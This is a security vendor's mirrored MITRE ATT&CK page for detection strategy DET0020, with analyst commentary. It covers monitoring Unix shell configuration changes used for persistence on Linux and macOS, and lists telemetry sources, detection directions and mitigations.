Live Active security incident? Get immediate response
MITRE ATT&CK® Detection Strategy

DET0020: Detect Shell Configuration Modification for Persistence via Event-Triggered Execution

This detection strategy is about finding persistence created by modifying Unix shell configuration so commands run automatically when a user starts or logs...

EnterpriseDET0020Detection StrategyObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

This detection strategy is about finding persistence created by modifying Unix shell configuration so commands run automatically when a user starts or logs into a shell. For leaders, the risk is that a small change in a startup file can survive reboots or sessions, reappear during normal administrator activity, and support privilege escalation or long-term access on Linux and macOS systems.

Executive priority

Prioritize this where Linux or macOS systems support critical administration, development, cloud operations, or regulated workloads. Ask whether the organization can prove who changed shell configuration files, when the change occurred, and what command executed afterward. This is useful for incident response scoping, audit evidence around privileged access, and deciding whether endpoint logging and file integrity monitoring are adequate for Unix-like environments.

Technical view

The supplied ATT&CK relationship maps this strategy to T1546.004, Unix Shell Configuration Modification, under persistence and privilege escalation for Linux and macOS. SOC and detection teams should validate monitoring for changes to system-level shell configuration under /etc and user-level shell startup files in home directories, then correlate those changes with shell launches, SSH logins, user sessions, and unexpected child processes. Because MITRE did not provide official detection logic for this object, local baselining and environment-specific allowlisting are required.

Likely telemetry

  • File creation, modification, ownership, permission, and timestamp events for Unix shell configuration files in /etc and user home directories
  • Endpoint process execution telemetry for shells and child processes launched during login or interactive sessions
  • Authentication and session logs, including SSH login activity where available
  • File integrity monitoring or audit framework events on Linux and macOS endpoints
  • User, host, and privilege context for accounts modifying shell startup configuration

Detection direction

  • Validate that monitoring covers both system-wide and per-user shell configuration locations; focusing only on /etc can miss user-level persistence.
  • Correlate shell configuration changes with subsequent shell or SSH session starts and unusual commands spawned from those sessions.
  • Tune for legitimate administrator, developer, and configuration-management activity to reduce false positives while preserving evidence of who made the change.
  • Review high-risk patterns such as changes made by unexpected users, changes near authentication events, or modifications on systems that normally have stable shell profiles.
  • Use the relationship to T1546.004 as detection context, but do not assume coverage from this ATT&CK object alone because no official detection analytic was supplied.

Mitigation priorities

  • Establish baseline and change control for shell configuration on Linux and macOS systems that support critical operations.
  • Restrict write access to system-level shell configuration and apply least privilege for administrative accounts.
  • Use file integrity monitoring or endpoint audit controls for sensitive shell startup locations.
  • Ensure incident response procedures include review of shell startup files during persistence and privilege-escalation investigations.
  • Maintain compliance evidence showing configuration ownership, approved changes, and monitoring coverage for privileged Unix-like systems.
Analyst notes and limits

This object is a MITRE ATT&CK detection strategy, DET0020, and its meaningful context comes primarily from its relationship to T1546.004. The business value is in validating whether endpoint and identity telemetry can connect a configuration-file change to later event-triggered execution during shell use.

The official object provides no description, no detection text, no tactics, and no platforms directly on the detection strategy. Platform and tactic context are derived from the supplied relationship to T1546.004 only. Local file paths, shell types, normal administrator behavior, and logging capabilities must be confirmed in the environment before operationalizing detections.

Official MITRE ATT&CK definition

Detect Shell Configuration Modification for Persistence via Event-Triggered Execution

No official description is available in the imported ATT&CK source object.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

1 rows
Domain ID Name Relationship / procedure
Enterprise T1546.004 Unix Shell Configuration Modification Sub-technique This object detects Unix Shell Configuration Modification.
Relationship explorer

All related ATT&CK context

detects · Technique T1546.004: Unix Shell Configuration Modification Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
568282251633e21a...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 568282251633…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack DET0020
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use